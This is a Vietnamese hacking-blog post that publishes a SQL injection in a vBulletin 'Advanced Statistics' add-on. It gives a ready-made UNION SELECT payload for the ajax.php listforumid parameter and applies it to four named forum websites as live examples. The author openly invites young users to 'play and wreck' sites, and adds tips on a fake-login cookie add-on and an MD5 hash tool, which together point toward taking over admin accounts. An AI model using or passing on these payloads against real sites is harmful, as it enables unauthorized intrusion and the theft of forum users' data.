Advanced Statistics SQL injection

Tình hình ku juno nó cũng pub BUG này lên rồi thôi thì chả giữ làm gì :)) pub lên cho mấy bạn được gọi là " Trẻ Trâu" Nghịch và phá and SHOW  ha ha
_Mình chỉ hướng dẫn qua loa thôi không hướng dẫn chi tiết, khai thác cách nào thì tùy mấy bé ;)

  010101010101010101010101010101010101010101010101010101010   
   1                     VNHGROUP                          0
   0              H4cking - S3cure - Und3rGroup            0
   010101010101010101010101010101010101010101010101010101010
#####################################################################################################
->Vulnerability
#####################################################################################################

->http://target.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

#####################################################################################################

->eg: http://diendanhaiduong.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
http://sinhvientayan.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,
user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

http://vietsource.net/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

http://tuoitredonganh.vn/diendan/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
#####################################################################################################
[+] If vbb version 4.1.2,3,4,5 you can install addons Advanced Cookie Manager fake login
[+] Md5 Hash Generator ->http://www.miraclesalad.com/webtools/md5.php
[+] Thanks to Juno-okyo &  all VNHgroup members

######################################################################

Tác giả : Henry Lute ~ Blog chia sẻ kiến thức Công nghệ thông tin

Bài viết Advanced Statistics SQL injection được viết bởi Henry Lute vào Saturday, January 17, 2015 .
Hi vọng bài viết có thể hữu ích với bạn. Cảm ơn bạn đã ghé thăm, vui lòng để lại bình luận.
Đã có 0 bình luận về bài viết Advanced Statistics SQL injection
 

0 comments :

Post a Comment